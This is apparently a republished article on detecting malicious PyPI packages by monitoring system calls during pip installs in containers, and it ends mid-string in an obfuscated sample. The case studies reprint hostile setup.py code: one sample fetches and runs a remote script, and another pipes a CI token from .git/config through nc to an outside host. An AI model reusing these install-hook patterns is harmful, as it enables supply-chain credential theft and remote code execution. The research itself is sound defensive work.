How to find malicious software packages on PyPI

2025-07-12 Update From: SLTechnology News&Howtos

Shulou (Shulou.com) 06/01 Report

This article looks at how to find malicious software packages on PyPI. It walks through the analysis and the approach in detail, in the hope of giving readers who face this problem a simpler way to tackle it.

About a year ago, the Python Software Foundation (PSF) published a Request for Information (RFI) on how to detect malicious packages uploaded to PyPI. This is clearly a practical problem, and one that affects almost every package manager.

In fact, package managers like PyPI are critical infrastructure that almost every company relies on. This is an area of interest to me, so I responded with my thoughts on how we could approach the problem. In this article, I'll detail how I installed and analyzed each package on PyPI, looking for potentially malicious activity.

How to find malicious libraries

To execute arbitrary commands during package installation, authors usually add code to the package's setup.py file; see this code base for details.

Broadly speaking, there are two ways to find potentially malicious dependencies: static analysis and dynamic analysis. Static analysis is interesting, but this article focuses on dynamic analysis.

So what exactly are we looking for?

The first thing to know is that a lot of important work is done by the kernel. Ordinary programs (such as pip) that need the kernel to perform a task do so through system calls, or syscalls. Opening files, establishing network connections, and executing commands are all done through system calls.

This also means that if we can monitor system calls during a Python package installation, we can look for any suspicious events. The nice thing about this is that no matter how many layers of obfuscation the malicious code goes through, we can always see what the code is actually trying to do.

So all we have to do is monitor system calls. How do we do that?

Monitoring system calls using Sysdig

In fact, the community already provides a number of tools to help us monitor system calls. For our purposes, I chose Sysdig because it provides structured output and helps us filter the data well.

To achieve this, whenever I started the Docker container that installs a package, I also started a Sysdig process that monitors only the events from that container. In addition, I filtered out network reads and writes going to pypi.org or files.pythonhosted.org, because they are unrelated to our goal.
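The host exclusion described above can also be sketched as a post-processing step in Python. This is only an illustration: the event dictionaries and their "host" key are a hypothetical layout, not Sysdig's output format, and the article applies its filtering in Sysdig itself.

```python
# Hosts that pip contacts during any install; traffic to them is noise.
# NOTE: the event layout used here is a hypothetical one for illustration,
# not the format Sysdig emits.
IGNORED_HOSTS = {"pypi.org", "files.pythonhosted.org"}


def is_ignored(host: str) -> bool:
    """True if host is an ignored host or a subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == h or host.endswith("." + h) for h in IGNORED_HOSTS)


def interesting_events(events):
    """Drop events whose 'host' is one of PyPI's own hosts; keep the rest."""
    return [e for e in events if not is_ignored(e.get("host", ""))]


sample_events = [
    {"type": "connect", "host": "pypi.org"},
    {"type": "connect", "host": "files.pythonhosted.org"},
    {"type": "connect", "host": "example.com"},
    {"type": "open", "path": "/tmp/demo"},
]

kept = interesting_events(sample_events)
```

Events without a host (such as file opens) pass through untouched, so only traffic to the package index itself is discarded.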

Now that we have a way to catch system calls, there is one more problem that has to be solved, namely how to get a complete list of all available PyPI packages.

Get Python packages

Fortunately, PyPI provides an API called "Simple API," which can be thought of as a large HTML page containing links to each package. We can crawl the information on this page and use pup to parse the links, so we can get about 268000 packages:

❯ curl https://pypi.org/simple/ | pup 'a text{}' > pypi_full.txt
❯ wc -l pypi_full.txt
268038 pypi_full.txt
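For readers without pup, the same extraction can be sketched with Python's standard library. The sample HTML below is a made-up stand-in for the real index page, and the class and function names are illustrative rather than anything used in the original pipeline.

```python
from html.parser import HTMLParser


class SimpleIndexParser(HTMLParser):
    """Collect the text of every <a> element, like pup's 'a text{}'."""

    def __init__(self):
        super().__init__()
        self._in_anchor = False
        self.names = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._in_anchor = True

    def handle_endtag(self, tag):
        if tag == "a":
            self._in_anchor = False

    def handle_data(self, data):
        # Only keep non-empty text that appears inside an anchor.
        if self._in_anchor and data.strip():
            self.names.append(data.strip())


def package_names(html: str) -> list[str]:
    parser = SimpleIndexParser()
    parser.feed(html)
    parser.close()
    return parser.names


# Made-up sample standing in for the page served at https://pypi.org/simple/
SAMPLE = """<!DOCTYPE html>
<html><body>
<a href="/simple/requests/">requests</a>
<a href="/simple/flask/">Flask</a>
</body></html>"""

names = package_names(SAMPLE)
```

In a real run the HTML would come from fetching the index page instead of the SAMPLE string; parsing is kept separate from fetching so it can be tried offline.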

For our experimental scenario, all we need is the latest version of each package, and our pipeline is as follows:

In short, we send the name of each package to a set of EC2 instances, which can get some metadata about the package from PyPI, and then launch sysdig and a series of containers to install the package via pip, collecting system calls and network traffic at the same time. All data is then transferred to S3 for subsequent analysis.

The whole process is shown below:

When this is done, we will store approximately 1TB of data in an S3 Bucket, which contains approximately 245000 software packages. After we clean up the metadata and output, we get a series of JSON files:

{
  "metadata": {},
  "output": {
    "dns": [],          // Any DNS requests made
    "files": [],        // All file access operations
    "connections": [],  // TCP connections established
    "commands": [],     // Any commands executed
  }
}
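A minimal sketch of how one such record might be summarized in Python follows. It assumes the stored files are plain JSON (the // comments above being annotations only), that DNS entries carry a "name" key as in the case studies later in this article, and that commands are plain strings. The sample values are invented.

```python
import json


def summarize(record: dict) -> dict:
    """Reduce one per-package record to a few comparable fields."""
    output = record.get("output", {})
    return {
        # Assumes each DNS entry is an object with a "name" key.
        "dns_names": sorted({d["name"] for d in output.get("dns", [])}),
        "files_touched": len(output.get("files", [])),
        "connections": len(output.get("connections", [])),
        "commands": list(output.get("commands", [])),
    }


# Invented sample record using reserved example values.
raw = """
{
  "metadata": {},
  "output": {
    "dns": [{"name": "example.com", "addresses": ["192.0.2.10"]}],
    "files": [{"filename": "/tmp/demo", "flag": "O_RDONLY"}],
    "connections": [],
    "commands": ["touch /tmp/demo"]
  }
}
"""

summary = summarize(json.loads(raw))
```

Missing sections default to empty lists, so a package that triggered no activity still yields a complete summary.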

I then wrote a series of scripts to aggregate the data and analyze the packages' behavior. Let's dig into the results.

Network requests

There are many reasons why a package might need to make a network connection during installation. It may need to download legitimate binary components or other resources, or it may be trying to exfiltrate data or credentials from the system.

We found that 460 packages established network connections to 109 unique hosts. Quite a few of these are the result of packages sharing a dependency that makes the network connection, and they can be filtered out by mapping dependencies.
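One way the dependency mapping could work is sketched below: subtract from each package's observed hosts any host already observed for one of its transitive dependencies. The package names, hosts, and data layout are all hypothetical, and this is not the author's script.

```python
def transitive_deps(pkg, deps):
    """All direct and indirect dependencies of pkg (cycle-safe)."""
    seen = set()
    stack = list(deps.get(pkg, ()))
    while stack:
        dep = stack.pop()
        if dep not in seen:
            seen.add(dep)
            stack.extend(deps.get(dep, ()))
    seen.discard(pkg)
    return seen


def own_hosts(pkg, observed, deps):
    """Hosts seen while installing pkg that no dependency explains."""
    inherited = set()
    for dep in transitive_deps(pkg, deps):
        inherited |= observed.get(dep, set())
    return observed.get(pkg, set()) - inherited


# Hypothetical data: hosts contacted during each package's install.
observed = {
    "downloader": {"example.com"},
    "lib": {"example.com"},
    "app": {"example.com", "tracker.example.net"},
}
# Hypothetical dependency map: app -> lib -> downloader.
deps = {"app": ["lib"], "lib": ["downloader"]}

app_hosts = own_hosts("app", observed, deps)
```

The trade-off is that a package contacting the same host as one of its dependencies is hidden as well, so this is a noise filter and not proof of innocence.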

Command execution

As with network connections, there are good reasons for packages to run system commands during installation, such as compiling native binaries or setting up the correct environment. Looking through our sample set, we found 60725 packages that execute commands during installation. And just as with network connections, keep in mind that many of these are the result of a dependency that runs the command, not of the package itself.
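With this many packages running commands, some triage helps. The sketch below flags recorded commands that invoke a program from a small watchlist. The watchlist is purely an assumption made for illustration, and the pipe splitting is deliberately naive (it ignores ";", "&&", and quoted "|" characters).

```python
import shlex

# Hypothetical watchlist of network-capable tools; an assumption for
# illustration, not a list taken from the original analysis.
WATCHLIST = {"nc", "ncat", "socat", "curl", "wget"}


def programs(command: str) -> set[str]:
    """Return the program names invoked by a recorded command string."""
    # Recorded commands often look like "sh -c <script>"; unwrap the prefix.
    if command.startswith("sh -c "):
        command = command[len("sh -c "):]
    found = set()
    for part in command.split("|"):  # naive pipeline split
        try:
            tokens = shlex.split(part)
        except ValueError:  # unbalanced quotes: fall back to whitespace split
            tokens = part.split()
        if tokens:
            # Strip any directory prefix, e.g. /usr/bin/nc -> nc
            found.add(tokens[0].rsplit("/", 1)[-1])
    return found


def flagged(commands):
    """Commands that run at least one watchlisted program."""
    return [c for c in commands if programs(c) & WATCHLIST]


sample_commands = [
    "sh -c gcc -c foo.c",
    "sh -c grep token /app/config | /usr/bin/nc example.com 5566",
    "touch /tmp/x",
]

hits = flagged(sample_commands)
```

A hit is only a prompt for manual review: compilers and build tools dominate legitimate installs, and a watchlist like this both misses things and raises false alarms.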

Interesting software packages

A closer look reveals that most network connections and commands appear to be legitimate. But I want to use some strange behaviors as case studies to illustrate how useful this analysis can be.

i-am-malicious

Here we found a package called i-am-malicious, which is indeed malicious. If the name isn't obvious enough, the following details settle it:

{
  "dns": [{
    "name": "gist.githubusercontent.com",
    "addresses": [
      "199.232.64.133"
    ]
  }],
  "files": [
    ...
    {
      "filename": "/tmp/malicious.py",
      "flag": "O_RDONLY|O_CLOEXEC"
    },
    ...
    {
      "filename": "/tmp/malicious-was-here",
      "flag": "O_TRUNC|O_CREAT|O_WRONLY|O_CLOEXEC"
    },
    ...
  ],
  "commands": [
    "python /tmp/malicious.py"
  ]
}

We see that it connects to gist.githubusercontent.com, executes a Python file, and creates a file called "/tmp/malicious-was-here". Sure enough, all of this is done from setup.py:

from urllib.request import urlopen

handler = urlopen("https://gist.githubusercontent.com/moser/49e6c40421a9c16a114bed73c51d899d/raw/fcdff7e08f5234a726865bb3e02a3cc473cecda7/malicious.py")
with open("/tmp/malicious.py", "wb") as fp:
    fp.write(handler.read())

import subprocess

subprocess.call(["python", "/tmp/malicious.py"])

maliciouspackage

Another malicious package is named, just as plainly, maliciouspackage. Here is the relevant output:

{
  "dns": [{
    "name": "laforge.xyz",
    "addresses": [
      "34.82.112.63"
    ]
  }],
  "files": [
    {
      "filename": "/app/.git/config",
      "flag": "O_RDONLY"
    },
  ],
  "commands": [
    "sh -c apt install -y socat",
    "sh -c grep ci-token /app/.git/config | nc laforge.xyz 5566",
    "grep ci-token /app/.git/config",
    "nc laforge.xyz 5566"
  ]
}

This package seems to extract tokens from the ".git/config" file and upload them to laforge.xyz. By analyzing its setup.py, we can see the following:

...
import os

os.system('apt install -y socat')
os.system('grep ci-token /app/.git/config | nc laforge.xyz 5566')

easyIoCtl

There is also a package called easyIoCtl that claims to abstract IO operations, but we found that it executes the following commands:

[
  "sh -c touch /tmp/testing123",
  "touch /tmp/testing123"
]

This is suspicious, but not necessarily malicious. Still, it is a good example of the value of tracing system calls. Here is the setup.py file for the project:

class MyInstall():
    def run(self):
        control_flow_guard_controls = 'l0nE@`eBYNQ)Wg+-,ka}fM(=2v4AVp! [dR/\\ZDF9s\x0c~PO%yc X3UK:.w\x0bL$Ijq
